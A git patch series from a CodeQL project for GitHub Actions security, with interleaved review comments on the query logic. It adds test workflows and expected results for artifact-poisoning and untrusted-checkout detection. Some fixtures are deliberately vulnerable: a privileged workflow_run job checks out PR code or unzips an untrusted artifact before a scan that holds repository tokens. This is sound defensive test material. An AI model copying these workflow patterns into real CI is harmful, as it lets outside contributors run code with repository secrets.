@@ -0,0 +1,23 @@ +name: Sonar +on: + workflow_run: + workflows: [PR Build] + types: [completed] +jobs: + sonar: + runs-on: ubuntu-latest + timeout-minutes: 30 + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: Checkout PR code + uses: actions/checkout@v3 + with: + repository: ${{ github.event.workflow_run.head_repository.full_name }} + ref: ${{ github.event.workflow_run.head_branch }} + fetch-depth: 0 + + - name: SonarCloud Scan + uses: sonarsource/sonarcloud-github-action@master + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml new file mode 100644 index 00000000000..6347db51e3c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml 
@@ -0,0 +1,41 @@ +name: Sonar +on: + workflow_run: + workflows: [PR Build] + types: [completed] +jobs: + sonar: + runs-on: ubuntu-latest + timeout-minutes: 30 + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: Download artifacts + uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "rsc-pr-build-artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/rsc-pr-build-artifacts.zip`, Buffer.from(download.data)); + + - name: Unzip artifacts + run: unzip rsc-pr-build-artifacts.zip + + - name: SonarCloud Scan + uses: sonarsource/sonarcloud-github-action@master + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 5c784595dbe..53b14ee7b50 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -14,6 +14,7 @@ edges | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -44,6 +45,8 @@ nodes | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -61,3 +64,4 @@ subpaths | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | 
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index e6108dddd2a..49cee7772c0 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -14,6 +14,7 @@ edges | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -44,5 +45,7 @@ nodes | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index d05c7bebc07..58a000efac4 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -29,4 +29,6 @@ | .github/workflows/pr-workflow.yml:453:15:453:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:25:15:25:34 | pnpm/action-setup@v3 | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/test13.yml:15:13:15:53 | sushichop/action-repository-permission@v2 | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | +| .github/workflows/test17.yml:20:21:20:63 | sonarsource/sonarcloud-github-action@master | Unpinned 3rd party Action 'Sonar' step $@ uses 'sonarsource/sonarcloud-github-action' with ref 'master', not a pinned commit hash | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Uses Step | +| .github/workflows/test18.yml:37:21:37:63 | sonarsource/sonarcloud-github-action@master | Unpinned 3rd party Action 'Sonar' step $@ uses 'sonarsource/sonarcloud-github-action' with ref 'master', not a pinned commit hash | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:13:10:22 | foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 2380236acca..baf354179b3 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -262,6 +262,9 @@ edges | .github/workflows/test16.yml:270:9:273:6 | Run Step | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | .github/workflows/test16.yml:281:9:294:54 | Uses Step | +| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:33:15:36:12 | Run Step | +| .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -325,6 +328,7 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | From 6dbbfa967277211aba958b5a261ff5c767dddeef Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 21 Oct 2024 12:12:37 +0200 Subject: [PATCH 0604/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e5471e23651..c908efa68f7 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.69 +version: 0.1.70 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 660f3287090..d2c2e26c361 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.69 +version: 0.1.70 groups: [actions, queries] suites: codeql-suites extractor: javascript From 023e8cbe3e00a1207d641f8f8139e942275b585d Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Mon, 21 Oct 2024 20:59:42 -0400 Subject: [PATCH 0605/1267] factor semver to separate function --- .../actions/security/UseOfUnversionedImmutableAction.qll | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll index 2be71612f26..3f65a2ffc72 100644 
--- a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll +++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -6,6 +6,11 @@ class UnversionedImmutableAction extends UsesStep { UnversionedImmutableAction() { immutableActionsDataModel(immutable_action) and this.getCallee() = immutable_action and - not this.getVersion().regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$") + isNotSemVer(this.getVersion()) } } + +bindingset[version] +predicate isNotSemVer(string version) { + not version.regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$") +} From da10ee74d353765cd60180afc8899ff7038614cb Mon Sep 17 00:00:00 2001 
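Review bot: `isNotSemVer` has no QLDoc, and its name promises more than the pattern checks. The regex accepts `v1`, `1.x` and any number of dot-separated numeric components, while it rejects semver pre-release or build suffixes such as `1.2.3-rc.1`. A positively named predicate reads better at the call site: define `predicate isSemVer(string version)` with the un-negated `regexpMatch` and write `not isSemVer(this.getVersion())` in the characteristic predicate. Add a QLDoc line stating which ref shapes count as a version, so a later edit to the pattern does not silently change what the query reports. The class body starts outside the hunk.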
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 11:18:42 +0200 Subject: [PATCH 0606/1267] Add workflow_dispatch and scheduled to the list of privileged and external (user interaction) events --- .../codeql/actions/dataflow/FlowSources.qll | 5 +- .../security/UntrustedCheckoutQuery.qll | 38 +++++-- ql/lib/ext/config/context_event_map.yml | 2 - .../config/externally_triggereable_events.yml | 3 +- .../ext/config/untrusted_event_properties.yml | 3 - .../CWE-829/UntrustedCheckoutCritical.ql | 6 +- .../CWE-078/CommandInjectionCritical.expected | 7 -- .../CWE-078/CommandInjectionMedium.expected | 9 -- .../CWE-094/.github/workflows/test18.yml | 33 ++++++ .../CWE-094/CodeInjectionCritical.expected | 4 + .../CWE-094/CodeInjectionMedium.expected | 3 + .../CWE-829/.github/workflows/test19.yml | 22 ++++ .../CWE-829/.github/workflows/test20.yml | 22 ++++ .../.github/workflows/untrusted_checkout.yml | 18 +++- .../.github/workflows/untrusted_checkout4.yml | 49 --------- .../UntrustedCheckoutCritical.expected | 102 +++++++++--------- .../CWE-829/UntrustedCheckoutHigh.expected | 4 + .../CWE-829/UntrustedCheckoutMedium.expected | 4 - 18 files changed, 195 insertions(+), 139 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b79a86ce27a..91b110f87ee 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -40,9 +40,10 @@ class GitHubCtxSource extends RemoteFlowSource { class GitHubEventCtxSource extends RemoteFlowSource { string flag; + string context; GitHubEventCtxSource() { - exists(Expression e, string context, string regexp | + exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and ( @@ -62,6 +63,8 @@ class GitHubEventCtxSource extends RemoteFlowSource { } override string getSourceType() { result = flag } + + string getContext() { result = context } } abstract class CommandSource extends RemoteFlowSource { diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index c9a78f6d0b6..336afdc73b1 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -197,9 +197,23 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and ( - exists(ActionsMutableRefCheckoutFlow::PathNode sink | - ActionsMutableRefCheckoutFlow::flowPath(_, sink) and - sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) + exists( + ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink + | + ActionsMutableRefCheckoutFlow::flowPath(source, sink) and + sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) and + ( + not source.getNode() instanceof GitHubEventCtxSource + or + source.getNode() instanceof GitHubEventCtxSource and + // the context is available for the job trigger events + exists(string context, string context_prefix | + contextTriggerDataModel(this.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + context = source.getNode().(GitHubEventCtxSource).getContext() and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) + ) ) or // heuristic base on the step id and field name 
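Review bot: The trigger filter added to `ActionsMutableRefCheckout` uses `normalizeExpr(context).matches("%" + context_prefix + "%")`, and `matches` treats `_` as a single-character wildcard, so a model value such as `github.event.workflow_run` matches more than its literal text. The leading `%` also makes this a substring test, which may be intended for wrapped expressions but is looser than the name `context_prefix` suggests. The same condition is repeated verbatim in `ActionsSHACheckout` (hunk `@@ -241,9 +255,21 @@`), so a single helper predicate with a literal substring test would fix both and keep the two classes from drifting. The filter also depends on `this.getEnclosingWorkflow().getATriggerEvent()`; if that has no result for a checkout step defined in a composite action, such steps would silently drop out of both classes, which is worth pinning with a test. Both class bodies start and end outside their hunks.

```ql
/**
 * Holds if the context read by `source` is modelled as available for one of
 * the trigger events of the workflow enclosing `step`.
 */
private predicate isEventContextAvailable(UsesStep step, GitHubEventCtxSource source) {
  exists(string context_prefix |
    contextTriggerDataModel(step.getEnclosingWorkflow().getATriggerEvent().getName(),
      context_prefix) and
    // literal substring test: `_` in the model value is not treated as a wildcard
    exists(normalizeExpr(source.getContext()).indexOf(context_prefix))
  )
}

// … unchanged: class header, callee test and flowPath(source, sink) …
        (
          not source.getNode() instanceof GitHubEventCtxSource
          or
          isEventContextAvailable(this, source.getNode())
        )
// … unchanged: heuristic based on the step id and field name …
```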
@@ -241,9 +255,21 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and ( - exists(ActionsSHACheckoutFlow::PathNode sink | - ActionsSHACheckoutFlow::flowPath(_, sink) and - sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) + exists(ActionsSHACheckoutFlow::PathNode source, ActionsSHACheckoutFlow::PathNode sink | + ActionsSHACheckoutFlow::flowPath(source, sink) and + sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) and + ( + not source.getNode() instanceof GitHubEventCtxSource + or + source.getNode() instanceof GitHubEventCtxSource and + // the context is available for the job trigger events + exists(string context, string context_prefix | + contextTriggerDataModel(this.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + context = source.getNode().(GitHubEventCtxSource).getContext() and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) + ) ) or // heuristic base on the step id and field name diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index 4c2451b5ab8..a5e8ced2e9e 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -40,8 +40,6 @@ extensions: - ["push", "github.event.commits"] - ["push", "github.event.head_commit"] - ["push", "github.event.changes"] - - ["repository_dispatch", "github.event.client_payload"] - - ["workflow_dispatch", "github.event.inputs"] - ["workflow_run", "github.event.workflow"] - ["workflow_run", "github.event.workflow_run"] - ["workflow_run", "github.event.changes"] diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml index 028671c243d..c3481c1cca5 100644 --- a/ql/lib/ext/config/externally_triggereable_events.yml +++ b/ql/lib/ext/config/externally_triggereable_events.yml 
@@ -16,4 +16,5 @@ extensions: - ["pull_request_target"] - ["workflow_run"] # depending on branch filter - ["workflow_call"] # depending on caller - + - ["workflow_dispatch"] + - ["scheduled"] diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml index be2e1c9c798..1e54fa6eca3 100644 --- a/ql/lib/ext/config/untrusted_event_properties.yml +++ b/ql/lib/ext/config/untrusted_event_properties.yml @@ -24,8 +24,6 @@ extensions: - ["github\\.event\\.workflow_run\\.head_commit\\.message", "text"] - ["github\\.event\\.pull_request\\.head\\.repo\\.description", "text"] - ["github\\.event\\.workflow_run\\.head_repository\\.description", "text"] - - ["github\\.event\\.client_payload\\[[0-9]+\\]", "text"] - - ["github\\.event\\.client_payload", "text"] - ["github\\.event\\.changes\\.body\\.from", "title"] # BRANCH - ["github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "branch"] @@ -59,7 +57,6 @@ extensions: # JSON - ["github", "json"] - ["github\\.event", "json"] - - ["github\\.event\\.client_payload", "json"] - ["github\\.event\\.comment", "json"] - ["github\\.event\\.commits", "json"] - ["github\\.event\\.discussion", "json"] diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 4b87ad00c0f..84d85a99801 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql 
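Review bot: The added row `- ["scheduled"]` does not match GitHub's trigger name, which is `schedule` (`on: schedule:`). If this model is compared against the workflow's trigger keys, as the `getATriggerEvent().getName()` lookup elsewhere in this commit suggests, the row can never match and scheduled workflows stay outside the list; the row should read `- ["schedule"]`. The two new rows would also benefit from a trailing comment in the style of the existing `# depending on caller`, recording why `workflow_dispatch` and `schedule` are treated as externally triggerable.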
@@ -47,6 +47,8 @@ where ) and // the checkout occurs in a privileged context inPrivilegedContext(poisonable, event) and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout")) -select poisonable, checkout, poisonable, "Execution of untrusted code on a privileged workflow. $@", - event, event.getLocation().getFile().toString() +select poisonable, checkout, poisonable, + "Execution of untrusted code on a privileged workflow ($@)", event, + event.getLocation().getFile().toString() diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index b66822accab..decabad082f 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected 
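Review bot: The new clause `not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout"))` drops the critical alert whenever any control check guards the checkout step, and nothing in the hunk says which kinds of check are meant to qualify. test19.yml in this commit gates a checkout of `github.event.pull_request.head.ref` on a `safe to test` label; a label gate does not pin the commit, so the code that runs can differ from the code that was reviewed, and that case should still be reported at some severity. The expected output of the High query changes in this commit, but its logic is not visible here. A comment above the clause would make the intent reviewable, for example `// a check on the checkout step also covers the steps that run the checked-out code; label-gated mutable refs are left to UntrustedCheckoutHigh`, adjusted to what the High query actually does. The `where` clause starts outside the hunk.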
@@ -1,13 +1,6 @@ edges -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index 393dde04f35..99ebb1edc05 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected 
@@ -1,14 +1,5 @@ edges -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | 